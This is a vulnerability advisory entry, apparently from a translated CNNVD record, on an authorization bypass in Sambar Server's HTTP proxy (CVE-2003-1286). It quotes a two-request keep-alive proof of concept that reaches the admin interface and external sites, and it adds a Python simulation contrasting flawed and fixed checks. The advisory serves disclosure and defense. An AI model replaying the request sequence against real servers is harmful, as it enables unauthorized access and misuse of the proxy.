Sambar Open Proxy and Authorization Bypass Vulnerability

Vulnerability ID: 1107173
Vulnerability type: Other
Published: 2003-01-30
Updated: 2006-01-20
CVE ID: CVE-2003-1286
CNNVD-ID: CNNVD-200312-422
Affected platform: Windows
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/24076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-422
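|Vulnerability details
The HTTP Proxy in Sambar Server versions before 6.0 beta 6 contains a vulnerability. When security.ini lacks a 127.0.0.1 proxydeny entry, a remote attacker can issue a "Connection: keep-alive" request ahead of the proxy request and thereby send HTTP proxy requests to the Sambar server administrator interface and to external web servers.
|Exploit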
source: http://www.securityfocus.com/bid/10256/info

Sambar improperly validates the IP address of an originating connection and can be used to gain access to the administration interface without authorization.

Once the remote attacker has gained access to the administrative interface, further attacks are possible, including privilege escalation and unauthorized system access.

-> GET / HTTP/1.1
Connection: keep-alive
*This is a valid web server request. It's granted.

<- Sambar default web page

*Because the connection is keep-alive, it's not closed after the page is sent.

-> GET http://www.example.com HTTP/1.1

*This is a valid proxy request. This time the source IP is not validated, because the connection was already established.

<- Web page from external site
*Sambar proxies our request.
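
The exchange above succeeds because the access decision is tied to the connection rather than to each request. The following added example is a simplified model (not Sambar's code and not part of the original advisory) that contrasts a handler validating only the first accepted request on a connection with one that authorizes every request. The allow-list network, function names and sample peer address are assumptions made for illustration.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network

# Assumed policy for this model: only this network may use the proxy.
PROXY_ALLOW = [ip_network("192.0.2.0/24")]

def is_proxy_request(method: str, target: str) -> bool:
    """CONNECT and absolute-form targets are proxy requests; '/path' is local."""
    return method.upper() == "CONNECT" or target.lower().startswith(("http://", "https://"))

def proxy_allowed(peer: str) -> bool:
    return any(ip_address(peer) in net for net in PROXY_ALLOW)

@dataclass
class Connection:
    peer: str
    validated: bool = False  # becomes True once one request has been accepted

def handle_flawed(conn: Connection, method: str, target: str) -> int:
    """Model of the flaw: policy is evaluated only until a request is accepted."""
    if not conn.validated:
        if is_proxy_request(method, target) and not proxy_allowed(conn.peer):
            return 403
        conn.validated = True
    return 200  # later requests on the kept-alive connection skip the check

def handle_fixed(conn: Connection, method: str, target: str) -> int:
    """Every request is classified and authorized, whatever the connection state."""
    if is_proxy_request(method, target) and not proxy_allowed(conn.peer):
        return 403
    return 200

def replay(handler, peer: str, requests) -> list:
    """Run a request sequence over one persistent connection; return status codes."""
    conn = Connection(peer)
    return [handler(conn, method, target) for method, target in requests]

# Constructed sample: the two requests from the exchange, sent on one connection.
EXCHANGE = [("GET", "/"), ("GET", "http://www.example.com")]
OUTSIDE_PEER = "203.0.113.7"  # constructed address outside PROXY_ALLOW

if __name__ == "__main__":
    print("flawed:", replay(handle_flawed, OUTSIDE_PEER, EXCHANGE))
    print("fixed: ", replay(handle_fixed, OUTSIDE_PEER, EXCHANGE))
```
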
|References

Source: XF
Name: sambar-http-gain-access(16054)
Link: http://xforce.iss.net/xforce/xfdb/16054
Source: BID
Name: 10256
Link: http://www.securityfocus.com/bid/10256
Source: SECTRACK
Name: 1007819
Link: http://securitytracker.com/id?1007819
Source: www.sambar.com
Link: http://www.sambar.com/security.htm
Source: IDEFENSE
Name: 20030925 Sambar Server Multiple Vulnerabilities
Link: http://www.idefense.com/application/poi/display?id=103&type=vulnerabilities&flashstatus=true
Source: SECUNIA
Name: 9578
Link: http://secunia.com/advisories/9578
Source: BUGTRAQ
Name: 20040430 SECURITY.NNOV: Sambar security quest
Link: http://archives.neohapsis.com/archives/bugtraq/2004-04/0353.html